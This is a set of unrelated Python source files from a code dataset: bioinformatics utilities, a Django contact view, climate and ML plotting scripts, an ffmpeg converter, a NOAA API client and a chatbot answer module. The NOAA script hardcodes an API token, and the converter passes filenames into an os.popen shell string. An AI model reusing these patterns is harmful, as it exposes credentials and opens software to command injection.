identifiers of the genes belonging to one family.\n '''\n families = []\n with open(file) as families_file:\n for line in families_file:\n current_family = line.rstrip(\"\\n\")\n current_family = current_family.split(\",\")\n current_family = [i for i in current_family if i != \"\"]\n families.append(current_family)\n return(families)\n\ndef read_fasta(input_file):\n '''\n Given a fasta file return a first lists containing the sequence identifiers and a second list containing teh sequences (in the same order).\n '''\n file_to_read = open(input_file)\n input_lines = file_to_read.readlines()\n file_to_read.close()\n input_lines = [i.rstrip(\"\\n\") for i in input_lines]\n names = [i.lstrip(\">\") for i in input_lines if i[0] == \">\"]\n sequences = [i for i in input_lines if i[0] != \">\"]\n if len(sequences) != len(names):\n print(\"Problem extracting data from fasta file!\")\n print(len(sequences))\n print(len(names))\n raise Exception\n if len(sequences) == 0:\n print(\"No sequences were extracted!\")\n raise Exception\n return(names, sequences)\n\ndef read_many_fields(input_file, delimiter):\n '''\n Read a csv/tsv/... into a list of lists with each sublist corresponding to one line.\n '''\n file_to_read = open(input_file)\n try:\n field_reader = csv.reader(file_to_read, delimiter = delimiter)\n lines = []\n for i in field_reader:\n lines.append(i)\n file_to_read.close()\n return(lines)\n except:\n print(\"Problem reading file...\")\n return [[\"Problem reading file\"]]\n\ndef remove_directory(dir):\n '''\n Remove directory\n '''\n if os.path.exists(dir):\n shutil.rmtree(dir)\n\ndef remove_file(file_name):\n '''\n Remove a file, if it exists.\n '''\n try:\n os.remove(file_name)\n except FileNotFoundError:\n pass\n\ndef reverse_complement(base):\n '''\n Reverse complement a base.\n '''\n reverse_comps = {\n \"A\": \"T\",\n \"C\": \"G\",\n \"G\": \"C\",\n \"T\": \"A\",\n }\n return(reverse_comps[base])\n\n\ndef run_in_parallel(input_list, args, func, kwargs_dict = None, workers = None, onebyone = False):\n '''\n Take an input list, divide into chunks and then apply a function to each of the chunks in parallel.\n input_list: a list of the stuff you want to parallelize over (for example, a list of gene names)\n args: a list of arguments to the function. Put in \"foo\" in place of the argument you are parallelizing over.\n func: the function\n kwargs_dict: a dictionary of any keyword arguments the function might take\n workers: number of parallel processes to launch\n onebyone: if True, allocate one element from input_list to each process\n '''\n if not workers:\n #divide by two to get the number of physical cores\n #subtract one to leave one core free\n workers = int(os.cpu_count()/2 - 1)\n elif workers == \"all\":\n workers = os.cpu_count()\n #in the list of arguments, I put in \"foo\" for the argument that corresponds to whatever is in the input_list because I couldn't be bothered to do something less stupid\n arg_to_parallelize = args.index(\"foo\")\n if not onebyone:\n #divide input_list into as many chunks as you're going to have processes\n chunk_list = [input_list[i::workers] for i in range(workers)]\n else:\n #each element in the input list will constitute a chunk of its own.\n chunk_list = input_list\n pool = multiprocessing.Pool(workers)\n results = []\n #go over the chunks you made and laucnh a process for each\n for elem in chunk_list:\n current_args = args.copy()\n current_args[arg_to_parallelize] = elem\n if kwargs_dict:\n process = pool.apply_async(func, tuple(current_args), kwargs_dict)\n else:\n process = pool.apply_async(func, tuple(current_args))\n results.append(process)\n pool.close()\n pool.join()\n return(results)\n\n\ndef run_process(arguments, return_string = True, input_to_pipe = None, return_error = False, file_for_input = None, file_for_output = None, univ_nl = True, shell = False):\n '''\n Run a command on the command line. Supply command as a list of strings.\n EX: run_process([\"cat\", \"hello!\"], file_for_output = \"hello.txt\")\n '''\n if file_for_input:\n input_file = open(file_for_input)\n stdin_src = input_file\n else:\n stdin_src = subprocess.PIPE\n if file_for_output:\n output_file = open(file_for_output, \"w\")\n stdout_dest = output_file\n else:\n stdout_dest = subprocess.PIPE\n arguments = [str(i) for i in arguments]\n if shell:\n arguments = \" \".join(arguments)\n process = subprocess.Popen(arguments, shell = shell, stdout = stdout_dest, stderr = subprocess.PIPE,\n stdin = stdin_src, universal_newlines = univ_nl)\n if input_to_pipe:\n stdout, stderr = process.communicate(input_to_pipe)\n else:\n stdout, stderr = process.communicate()\n if file_for_input:\n input_file.close()\n if file_for_output:\n output_file.close()\n return_code = process.poll()\n if return_code != 0:\n print(\"Process failed!\")\n print(\" \".join(arguments))\n print(stderr)\n return(\"error\")\n #if the process returns bytes but you want to get a string back.\n if return_string and type(stdout) == bytes:\n stdout = stdout.decode(\"utf-8\")\n if return_error:\n return(stderr)\n else:\n return(stdout)\n\ndef update_counter(counter, step, string = None):\n '''\n Print out and update counter.\n '''\n if counter % step == 0:\n if string:\n print(\"{0}{1}\".format(string, counter))\n else:\n print(\"{0}\".format(counter))\n counter = counter + 1\n return(counter)\n\ndef write_to_fasta(names, seq, fasta_name):\n '''\n Write a set of sequence identifiers and sequences to fasta file.\n '''\n with open(fasta_name, \"w\") as file:\n for i in range(len(names)):\n file.write(\">{0}\\n\".format(names[i]))\n file.write(\"{0}\\n\".format(seq[i]))\n\n\ndef stringify(item):\n if isinstance(item, list):\n return [str(i) for i in item]\n else:\n return str(item)\n\ndef update_reset_count(count, limit):\n if count >= limit:\n count = 0\n else:\n count += 1\n return count\n","sub_path":"generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":22294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433688216","text":"from django.core.mail import send_mail\nfrom django.shortcuts import render\nfrom django.views import View\nfrom django.views.generic import CreateView\n\nfrom jogo.forms import ContatoForm\n\n\nclass ContatoView(View):\n\n template = 'jogo/contato.html'\n\n def get(self, request):\n form = ContatoForm()\n return render(request, self.template, {'form': form})\n\n def post(self, request):\n form = ContatoForm(request.POST)\n if form.is_valid():\n nome_time = form.cleaned_data['nome_time']\n nome_contato = form.cleaned_data['nome_contato']\n whats = form.cleaned_data['whats']\n email = form.cleaned_data['email']\n\n corpo = f'Nome do Time: {nome_time}\\n' \\\n f'Nome Contato: {nome_contato}\\n' \\\n f'WhatsApp: {whats}\\n' \\\n f'E-mail: {email}'\n\n send_mail(\n 'Contato Realmatismo FC', # Assunto\n corpo,\n 'diegodenzer.devops@gmail.com',\n ['realmatismo.cwb@gmail.com', 'marlosgiovanni@hotmail.com']\n )\n\n msg = 'Cadastro Realizado com sucesso!!!'\n\n return render(request, self.template, {'form': ContatoForm(), 'msg': msg})\n else:\n return render(request, self.template, {'form': form})\n","sub_path":"jogo/view/contato.py","file_name":"contato.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106812006","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 25 15:56:33 2019\n\n@author: zoescrewvala\n\"\"\"\n\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport pygemfxns_gcmbiasadj as pygemfxns\n\n#%%\ndef avg_parameters_20yr(component, area):\n \"\"\"\n sum up annually and convert to km^3, average every 20 yrs, then convert to m w.e. and average every 20 yrs again\n \"\"\"\n component_annual = ((pygemfxns.annual_sum_2darray(component))/1000)*area\n component_annual_regional_1 = np.sum(component_annual[:,1:], axis=0) # in km^3 aka gigatons\n component_avg_gt_20yr = (np.add.reduceat(component_annual_regional_1, np.arange(0, len(component_annual_regional_1), 20)))/20\n component_annual_regional_2 = ((component_annual_regional_1)/(np.sum(area[:,1:], axis=0)))*1000 # km^3 (gigatons) --> m w.e.\n component_avg_mwea_20yr = (np.add.reduceat(component_annual_regional_2, np.arange(0, len(component_annual_regional_2), 20)))/20\n \n return component_avg_gt_20yr, component_avg_mwea_20yr\n\n#%% X-Y PLOT\nsim_list = ['CanESM2', 'CCSM4', 'CSIRO-Mk3-6-0', 'CNRM-CM5', 'GFDL-CM3', 'GFDL-ESM2M', 'GISS-E2-R', 'IPSL-CM5A-LR', \n 'MPI-ESM-LR', 'NorESM1-M']\nrcp_list = ['26', '45', '85']\nRCP_list = ['RCP 2.6', 'RCP 4.5', 'RCP 8.5']\ncolor_list = ['b', 'm', 'r', 'k']\n\n\nfor j in range(len(rcp_list)): \n fig, axes = plt.subplots(2, 10, squeeze=False, sharex='col', sharey='row', \n gridspec_kw = {'wspace':0.1, 'hspace':0.05})\n for i in range(len(sim_list)):\n ds = xr.open_dataset(os.getcwd() + '/../Output/simulations/' + sim_list[i] + '/R1_' + sim_list[i] + '_rcp' + \n rcp_list[j] + '_c1_ba1_1sets_1980_2100.nc')\n time = ds.variables['year'].values[:]\n area = ds.variables['area_glac_annual'].values[:,:-1,0]\n # positive mass balance, summed annually\n acc = ds.variables['acc_glac_monthly'].values[:,:,0]\n# acc_annual = ((pygemfxns.annual_sum_2darray(acc))/1000)*area # convert m w.e. to km w.e.\n ref = ds.variables['refreeze_glac_monthly'].values[:,:,0]\n# refreeze_annual = ((pygemfxns.annual_sum_2darray(refreeze))/1000)*area # convert m w.e. to km w.e.\n mlt = ds.variables['melt_glac_monthly'].values[:,:,0]\n# melt_annual = ((pygemfxns.annual_sum_2darray(melt))/1000)*area # convert m w.e. to km w.e.\n abl = ds.variables['frontalablation_glac_monthly'].values[:,:,0]\n# ablation_annual = ((pygemfxns.annual_sum_2darray(melt))/1000)*area # convert m w.e. to km w.e.\n# \n acc_regional_avg_gt_20yr, acc_regional_avg_mwea_20yr = avg_parameters_20yr(acc, area)\n ref_regional_avg_gt_20yr, ref_regional_avg_mwea_20yr = avg_parameters_20yr(ref, area)\n mlt_regional_avg_gt_20yr, mlt_regional_avg_mwea_20yr = avg_parameters_20yr(mlt, area)\n abl_regional_avg_gt_20yr, abl_regional_avg_mwea_20yr = avg_parameters_20yr(abl, area)\n\n\n# # in gigatons (aka km^3)\n# refreeze_regional_annual = np.sum(refreeze_annual, axis=0)\n# acc_regional_annual = np.sum(acc_annual, axis=0)\n# melt_regional_annual = np.sum(melt_annual, axis=0)\n# ablation_regional_annual = np.sum(ablation_annual, axis=0)\n# \n# # averaged every 20 years\n# acc_regional_20yr = np.add.reduceat(acc_regional_annual[:-1], np.arange(0, len(acc_regional_annual)-1, 20))\n# acc_regional_20yr = (acc_regional_20yr)/20\n# refreeze_regional_20yr = np.add.reduceat(refreeze_regional_annual[:-1], np.arange(0, len(refreeze_regional_annual)-1, 20))\n# refreeze_regional_20yr = (refreeze_regional_20yr)/20\n# melt_regional_20yr = np.add.reduceat(melt_regional_annual[:-1], np.arange(0, len(melt_regional_annual)-1, 20))\n# melt_regional_20yr = (melt_regional_20yr)/20\n# ablation_regional_20yr = np.add.reduceat(ablation_regional_annual[:-1], np.arange(0, len(ablation_regional_annual)-1, 20))\n# ablation_regional_20yr = (ablation_regional_20yr)/20\n\n # X and Y values\n x_values = time[0:120:20]\n y_values = acc_regional_avg_gt_20yr\n y2_values = ref_regional_avg_gt_20yr\n y3_values = np.negative(mlt_regional_avg_gt_20yr)\n y4_values = np.negative(abl_regional_avg_gt_20yr)\n net = y_values + y2_values + y3_values + y4_values\n \n# # prep for averaging gcms\n# acc_gcm_avg_gt[i] = acc_regional_20yr\n# ref_gcm_avg_gt[i] = refreeze_regional_20yr\n# mlt_gcm_avg_gt[i] = melt_regional_20yr\n# abl_gcm_avg_gt[i] = ablation_regional_20yr\n \n # set up plot\n axes[0,i].bar(x_values, y_values, color='b', width=10, zorder=2)\n axes[0,i].bar(x_values, y2_values, bottom=y_values, color='m', width=10, zorder=3)\n axes[0,i].bar(x_values, y3_values, color='r', width=10, zorder=2)\n axes[0,i].bar(x_values, y4_values, bottom=y3_values, color='k', width=10, zorder=3)\n axes[0,i].scatter(x_values, net, color='w', marker='_', s=16, zorder=5)\n axes[0,i].set_title(label=sim_list[i], size=10, horizontalalignment='center', verticalalignment='baseline')\n\n ## m w.e. plots ##\n# # back to m w.e. after dividing by area\n# acc_regional_annual = ((np.sum(acc_annual, axis=0))/(np.sum(area, axis=0)))*1000\n# refreeze_regional_annual = ((np.sum(refreeze_annual, axis=0))/(np.sum(area, axis=0)))*1000\n# melt_regional_annual = ((np.sum(melt_annual, axis=0))/(np.sum(area, axis=0)))*1000\n# ablation_regional_annual = ((np.sum(ablation_annual, axis=0))/(np.sum(area, axis=0)))*1000\n# \n# # averaged every 20 years\n# acc_regional_20yr = np.add.reduceat(acc_regional_annual[:-1], np.arange(0, len(acc_regional_annual)-1, 20))\n# acc_regional_20yr = (acc_regional_20yr)/20\n# refreeze_regional_20yr = np.add.reduceat(refreeze_regional_annual[:-1], np.arange(0, len(refreeze_regional_annual)-1, 20))\n# refreeze_regional_20yr = (refreeze_regional_20yr)/20\n# melt_regional_20yr = np.add.reduceat(melt_regional_annual[:-1], np.arange(0, len(melt_regional_annual)-1, 20))\n# melt_regional_20yr = (melt_regional_20yr)/20\n# ablation_regional_20yr = np.add.reduceat(ablation_regional_annual[:-1], np.arange(0, len(ablation_regional_annual)-1, 20))\n# ablation_regional_20yr = (ablation_regional_20yr)/20\n\n # X and Y values\n x_values = time[0:120:20]\n y_values = acc_regional_avg_mwea_20yr\n y2_values = ref_regional_avg_mwea_20yr\n y3_values = np.negative(mlt_regional_avg_mwea_20yr)\n y4_values = np.negative(abl_regional_avg_mwea_20yr)\n net = y_values + y2_values + y3_values + y4_values\n\n \n# # prep for averaging gcms\n# acc_gcm_avg_mwea[i] = acc_regional_20yr\n# ref_gcm_avg_mwea[i] = refreeze_regional_20yr\n# mlt_gcm_avg_mwea[i] = melt_regional_20yr\n# abl_gcm_avg_mwea[i] = ablation_regional_20yr\n \n # set up plot\n axes[1,i].bar(x_values, y_values, color='b', width=10, zorder=2)\n axes[1,i].bar(x_values, y2_values, bottom=y_values, color='m', width=10, zorder=3)\n axes[1,i].bar(x_values, y3_values, color='r', width=10, zorder=2)\n axes[1,i].bar(x_values, y4_values, bottom=y3_values, color='k', width=10, zorder=3)\n axes[1,i].scatter(x_values, net, color='w', marker='_', s=16, zorder=4)\n\n# # averaging gcms\n# y_values = np.average(acc_gcm_avg_mwea, axis=0)\n# y2_values = np.average(ref_gcm_avg_mwea, axis=0)\n# y3_values = np.average(mlt_gcm_avg_mwea, axis=0)\n# y4_values = np.average(abl_gcm_avg_mwea, axis=0)\n \n# axes[1,i].set_title(label=sim_list[i], size=10, horizontalalignment='center', verticalalignment='baseline')\n\n ds.close()\n\n # figure styling\n# plt.subplots_adjust(bottom=0.1, right=0.4, top=0.4)\n\n # X-label\n for i in range(10):\n axes[1,i].set_xlabel('Year', size=12)\n axes[1,i].xaxis.set_major_locator(plt.MultipleLocator(40))\n axes[1,i].xaxis.set_minor_locator(plt.MultipleLocator(10))\n axes[1,i].tick_params(axis='x', rotation=70)\n #ax[0,0].set_xlim(0, 1.1)\n #ax[0,0].xaxis.set_tick_params(labelsize=12)\n #ax[0,0].set_xticklabels(['2015','2050','2100']) \n \n # Y-label\n axes[0,0].set_ylabel('Mass balance [Gt yr^-1]', size=10)\n axes[1,0].set_ylabel('Mass balance [m w.e. yr^-1]', size=10)\n axes[0,0].set_ylim(-110, 45)\n axes[1,0].set_ylim(-4.5, 1.75)\n \n # tick marks for m w.e. \n axes[1,0].yaxis.set_major_locator(plt.MultipleLocator(2))\n axes[1,0].yaxis.set_minor_locator(plt.MultipleLocator(0.5)) \n \n # tick marks for Gt\n axes[0,0].yaxis.set_major_locator(plt.MultipleLocator(40))\n axes[0,0].yaxis.set_minor_locator(plt.MultipleLocator(10)) \n \n \n # Legend\n# leg_lines = []\n# labels = ['Refreeze', 'Accumulation', 'Melt', 'Frontal Ablation']\n# label_colors = ['m', 'b', 'r', 'k']\n# for nlabel, label in enumerate(labels):\n# line = Line2D([0,0.5],[0,0.5], color=label_colors[nlabel], linewidth=2)\n# leg_lines.append(line)\n# axes[1,0].set_zorder(3)\n# axes[1,0].legend(leg_lines, labels, loc=(0.05,0.05), fontsize=12, \n# labelspacing=0.25, handlelength=1, handletextpad=0.25, borderpad=0, frameon=False)\n \n axes[1,0].text(1975, -4.2, RCP_list[j], fontsize=16, fontweight='extra bold')\n\n # save figure\n fig.set_size_inches(15, 6)\n figure_fp = os.getcwd() + '/../Output/plots/gcm_compare_parameters/'\n if os.path.exists(figure_fp) == False:\n os.makedirs(figure_fp)\n figure_fn = 'massbalparams_plot_' + rcp_list[j] + '.png'\n fig.savefig(figure_fp + figure_fn, bbox_inches='tight', dpi=300)\n \n # clear figure window after saving\n plt.clf()\n\n","sub_path":"barplot_parameters.py","file_name":"barplot_parameters.py","file_ext":"py","file_size_in_byte":9893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"386461141","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 8 07:45:48 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nimport seaborn as sns\r\ndf = pd.read_csv(\"train.csv\").dropna()\r\n\r\ndf[\"height(cm)\"] = df['height(cm)'] / 100\r\n\r\ndf.rename(columns = {\"height(cm)\" : \"height(m)\"}, inplace = True)\r\n\r\nX = df.iloc[:,[3, 5, 6, 7, 8]].values\r\ny = df.iloc[:,10].values\r\n\r\ndf.head()\r\n\r\ndf[\"pet_category\"].unique()\r\ndf[\"breed_category\"].unique()\r\ndf[\"color_type\"].unique()\r\ndf[\"condition\"].unique()\r\n\r\nplt.scatter(\"pet_category\", \"breed_category\", data = df)\r\nplt.scatter(\"pet_category\", \"color_type\", data = df)\r\nplt.scatter(\"pet_category\", \"height(m)\", data = df)\r\nplt.scatter(\"pet_category\", \"condition\", data = df)\r\nplt.scatter(\"pet_category\", \"length(m)\", data = df)\r\nplt.scatter(\"pet_category\", \"X1\", data = df)\r\nplt.scatter(\"pet_category\", \"X2\", data = df)\r\n\r\n#Splitting data set into training and test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.7) \r\n\r\n#Applying various classifiers\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.ensemble import RandomForestClassifier \r\n\r\nmodels = []\r\nmodels.append((\"LR\", LogisticRegression(solver = 'liblinear', multi_class= 'ovr')))\r\nmodels.append((\"KNN\", KNeighborsClassifier()))\r\nmodels.append((\"NB\", GaussianNB()))\r\nmodels.append((\"RF\", RandomForestClassifier(n_estimators=100, criterion='gini')))\r\n\r\n#K-fold Cross Validation\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\nbest_mean = []\r\nbest_std = []\r\nnames = []\r\n\r\nmodel_performance = pd.DataFrame()\r\n\r\nfor name, model in models:\r\n kcv = cross_val_score(model, X_train, y_train, cv = 10)\r\n best_mean.append((name, kcv.mean()))\r\n best_std((name, kcv.std()))\r\n model_performance = model_performance.append([kcv])\r\n names.append(name)\r\n \r\n#Making predictions on Validation Set\r\npredictions = pd.DataFrame()\r\nfor name, model in models:\r\n model.fit(X_train, y_train)\r\n predictions = predictions.append([model.predict(X_test)])\r\n predictions = predictions.T\r\n predictions.columns = [i for i in range(4)]\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Pet Adoption - HackerEarth/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"262488890","text":"import os\n\ndef converter(filename, input_format, output_format, directory):\n\ttry:\n\t\tpath = ('{}/{}').format(directory, filename)\n\t\tinput_file = ('\\'{}.{}\\'').format(path, input_format)\n\t\toutput_file = ('\\'{}.{}\\'').format(path, output_format)\n\t\tcommand = (\"ffmpeg -loglevel panic -i {} {}\").format(input_file, output_file)\n\t\tos.popen(command)\n\t\tprint('Το βίντεο μετατράπηκε με επιτυχία σε mp3. Τερματισμός προγράμματος.')\n\t\treturn\n\texcept:\n\t\tprint('Κάτι πήγε στραβά στην μετατροπή σε mp3. Ξανατρέξτε το πρόγραμμα.')\n\t\texit()\n\t\n\nif __name__ == \"__main__\":\n\tconverter()","sub_path":"modules/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"556636441","text":"import requests\nimport json\n\nfile_counter = 0\noffset_counter = 1\n\nurl = ' https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&locationid=FIPS:' \\\n '10003&startdate=2018-01-01&enddate=2018-01-31&limit=1000&offset=1001'\n\nr = requests.get(url, headers={\n 'token': 'kiMomNqDkIjROzHmmalPEEzfuKLCmEeI',\n 'Content-Type': 'application/json'\n})\njsonResult = r.json()\n\njsonR = jsonResult['results']\njsonPath = '/Users/amishra/DEV/DataEngineering.Labs.NOAADailySummaries/data/daily_summaries/'\nwith open('daily_summaries_FIPS10003_jan_2018_1' + '.json', \"w\") as outfile:\n json.dump(jsonResult, outfile)\nfile_counter = file_counter + 1\noffset_counter = offset_counter + 1000\n","sub_path":"data/daily_summaries/make_requests.py","file_name":"make_requests.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381871215","text":"from .models import *\nimport re\nimport spacy\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\nfrom .helpfunctions import *\nimport json\nfrom .apiai_code import *\nfrom string import Template\nfrom .answernews import *\n\nimport apiai\n\n#types: Building, Employee, Class\n#answer type:\n# location (map)\n# person\n# class\n# message\n# google url\n\nnlp = spacy.load(\"./QA/data/FIT_model_b_c_e\")\n\nfit_ner = None\nwith open(\"./QA/data/FIT_dictionary.txt\", \"r\") as f:\n lines = f.readlines()\n words = set(lines)\n fit_ner = [w.replace(\"\\n\",\"\") for w in words]\n\ndef translate(question_raw):\n standard_pairs = Word_Standard.objects.all()\n\n for s in standard_pairs:\n if s.original_word.lower() in question_raw.lower() and s.standard_word.lower() not in question_raw.lower():\n question_raw = question_raw.replace(s.original_word, s.standard_word)\n question_raw = question_raw.replace(s.original_word.lower(), s.standard_word)\n break\n\n doc_raw = nlp(question_raw)\n #case sensitive: capitalize every word\n question_capitalized = question_raw.title()\n\n doc_capitalized = nlp(question_capitalized)\n\n if doc_capitalized.ents == doc_raw.ents:\n return question_raw\n\n ents = doc_capitalized.ents\n\n question_translated = question_raw\n\n for ent in ents:\n if ent.text in fit_ner:\n raw_text = \"\".join([t.lower() for t in ent.text])\n question_translated = question_raw.replace(raw_text, ent.text)\n\n return question_translated\n\n\ndef answer_question(question):\n\n question = translate(question)\n doc = nlp(question)\n ents = doc.ents\n\n labels = [ent.label_ for ent in ents]\n\n print(ents)\n\n small_talk_result = small_talk(question)\n print(small_talk_result)\n if small_talk_result[\"answer_messages\"][0]:\n print(\"small talk\")\n answer = small_talk_result\n return answer\n else:\n answer_news_result = answernews(question)\n if answer_news_result != None:\n print(\"answer news\")\n answer = {\"answer_type\": \"string\", \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n answer[\"answer_messages\"].append(answer_news_result)\n elif \"FIT_BUILDING\" in labels or \"FIT_COURSE\" in labels or \"FIT_EMPLOYEE\" in labels:\n if \"FIT_BUILDING\" in labels:\n # asking about buildings\n print(\"building\")\n answer = answer_building(question, ents[0].text)\n elif \"FIT_COURSE\" in labels:\n # asking about course\n print(\"course\")\n answer = answer_course(question, ents[0].text)\n elif \"FIT_EMPLOYEE\" in labels:\n print(\"employee\")\n answer = answer_employee(question, ents[0].text)\n else:\n print(\"url\")\n answer = answer_url(question)\n\n return answer\n\n\ndef answer_building(question, keyword):\n answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n\n building = Building.objects.filter(Q(building_code__iexact=keyword) | Q(building_name__iexact=keyword) | Q(building_abbr__iexact=keyword))\n if building:\n answer[\"answer_type\"] = \"string\"\n\n if \"name\" in question.lower():\n for b in building:\n answer[\"answer_messages\"].append(b.building_name)\n elif \"code\" in question.lower():\n for b in building:\n answer[\"answer_messages\"].append(b.building_code)\n elif \"address\" in question.lower() or \"location\" in question.lower() or \"where\" in question.lower():\n answer[\"answer_type\"] = \"location\"\n answer[\"length_range\"] = range(len(building))\n for b in building:\n answer[\"answer_messages\"].append((b.street+\"\\n\"+b.city+\", \"+b.state+\"\\n\"+b.zip+\"\\n\", b.street))\n else:\n answer[\"answer_type\"] = \"location\"\n building_template = Template(\"Name: $name\\n\"\n \"Code: $code\\n\"\n \"Address: $address\\n\")\n for b in building:\n building_str = building_template.substitute(name=b.building_name, code=b.building_code, address=b.street+\"\\n\"+b.city+\", \"+b.state+\"\\n\"+b.zip+\"\\n\")\n answer[\"answer_messages\"].append((building_str, b.street))\n\n\n else:\n answer[\"answer_type\"] = \"string\"\n answer[\"answer_messages\"].append(\"Sorry, it's not in our database. Please check your spelling.\")\n return answer\n\n\ndef answer_course(question, keyword):\n answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n\n course = Course.objects.filter(Q(crn__iexact=keyword) | Q(title__iexact=keyword) | Q(subject__iexact=keyword[:3], course_number__iexact=keyword[-4:]) | Q(subject__iexact=keyword))\n\n if course:\n answer[\"answer_type\"] = \"string\"\n if \"instructor\" in question.lower() or \"teaches\" in question.lower() or \"teacher\" in question.lower() or \"who\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + c.instructor)\n elif \"location\" in question.lower() or \"classroom\" in question.lower() or \"class room\" in question.lower() or \"where\" in question.lower():\n answer[\"answer_type\"] = \"location\"\n answer[\"length_range\"] = range(len(course))\n for c in course:\n building = load_dirty_json(c.building)\n message = (\"section \" + c.section + \"\\n\" + building[\"name\"] + \" \" + c.room, building[\"street\"])\n answer[\"answer_messages\"].append(message)\n\n elif \"time\" in question.lower() or \"when\" in question.lower() or \"days\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + c.days + \" \" + c.begin_time + \"-\" + c.end_time)\n elif \"prerequisite\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + c.prerequisites)\n elif \"capacity\" in question.lower() or \"enroll\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + str(c.actual_enroll) + \"/\" + str(c.max_enroll))\n elif \"credit\" in question.lower():\n for c in course:\n answer[\"answer_messages\"].append(\"section \" + c.section + \"\\n\" + str(c.credit_hours))\n else:\n answer[\"answer_type\"] = \"string\"\n course_template = Template(\"CRN: $crn \\nCode: $code \\nSection: $section \\n\"\n \"Title: $title \\n Description: $description \\n\"\n \"Instructor: $instructor \\n\"\n \"Credit Hour: $credit_hour\\n\"\n \"Location: $location\\n\"\n \"Time: $time\\n\"\n \"Actual Enrollment: $actual, Max Enrollment: $max\")\n for c in course:\n location_str = \"TBA\"\n if c.building != \"TBA\":\n building = load_dirty_json(c.building.replace(\"None\", \"'None'\"))\n location_str = building[\"name\"] + \" \" + c.room\n\n course_str = course_template.substitute(crn=c.crn, code=c.subject+c.course_number, section=c.section,\n title=c.title, description=c.description, instructor=c.instructor,\n credit_hour=str(c.credit_hours), location=location_str,\n time=c.days + \" \" + c.begin_time + \"-\" + c.end_time,\n actual=c.actual_enroll, max=c.max_enroll)\n answer[\"answer_messages\"].append(course_str)\n\n\n else:\n answer[\"answer_type\"] = \"string\"\n answer[\"answer_messages\"].append(\"Sorry, it's not in our database. Please check your spelling.\")\n\n return answer\n\n\ndef answer_employee(question, keyword):\n answer = {\"answer_type\": None, \"answer_messages\": [], \"answer_locations\": [], \"answer_obj\": None}\n\n\n if \"professor\" in keyword.lower() or \"prof\" in keyword.lower() or \"dr\" in keyword.lower():\n keyword_list = keyword.split(\" \")[1:]\n keyword = keyword_list.join(\" \")\n\n if len(keyword.split(\" \")) == 2:\n employee = Employee.objects.filter(Q(last_name__iexact=keyword) | Q(first_name__iexact=keyword) | Q(first_name__iexact=keyword.split(\" \")[0], last_name__iexact=keyword.split(\" \")[1]))\n else:\n employee = Employee.objects.filter(Q(last_name__iexact=keyword) | Q(first_name__iexact=keyword))\n\n if employee:\n answer[\"answer_type\"] = \"string\"\n if \"contact\" in question.lower():\n for e in employee:\n answer[\"answer_messages\"].append(e.first_name + \" \" + e.last_name + \"\\n\" + 'email: ' + e.email + '\\n phone: +' + e.phone_international_code + ' (' + e.phone_area_code + ') ' + e.phone_number)\n elif \"email\" in question.lower():\n for e in employee:\n answer[\"answer_messages\"].append(e.first_name + \" \" + e.last_name + \"\\n\" + e.email)\n elif \"phone\" in question.lower() or \"number\" in question.lower():\n for e in employee:\n answer[\"answer_messages\"].append(e.first_name + \" \" + e.last_name + \"\\n\" + e.phone_international_code + ' (' + e.phone_area_code + ') ' + e.phone_number)\n elif \"where\" in question.lower() or \"office\" in question.lower() or \"find\" in question.lower():\n answer[\"answer_type\"] = \"location\"\n answer[\"length_range\"] = range(len(employee))\n\n for e in employee:\n position = load_dirty_json(e.position.replace(\"None\", \"'None'\"))\n\n primary = position[\"primary\"]\n building = primary[\"building\"]\n room = building[\"room\"]\n message = (e.first_name + \" \" + e.last_name + \"\\n\" + building[\"name\"] + \" \" + room[\"number\"], building[\"street\"])\n answer[\"answer_messages\"].append(message)\n\n\n else:\n answer[\"answer_type\"] = \"string\"\n employee_template = Template(\"Name: $prefix $first_name $last_name \\n\"\n \"Email: $email \\n\"\n \"Phone: $phone \\n\"\n \"Office: $office\")\n for e in employee:\n position = load_dirty_json(e.position.replace(\"None\", \"'None'\"))\n primary = position[\"primary\"]\n building = primary[\"building\"]\n room = building[\"room\"]\n employee_str = employee_template.substitute(prefix=e.prefix_name, first_name=e.first_name, last_name=e.last_name,\n email=e.email, phone=e.phone_international_code + ' (' + e.phone_area_code + ') ' + e.phone_number,\n office=building[\"name\"] + \" \" + 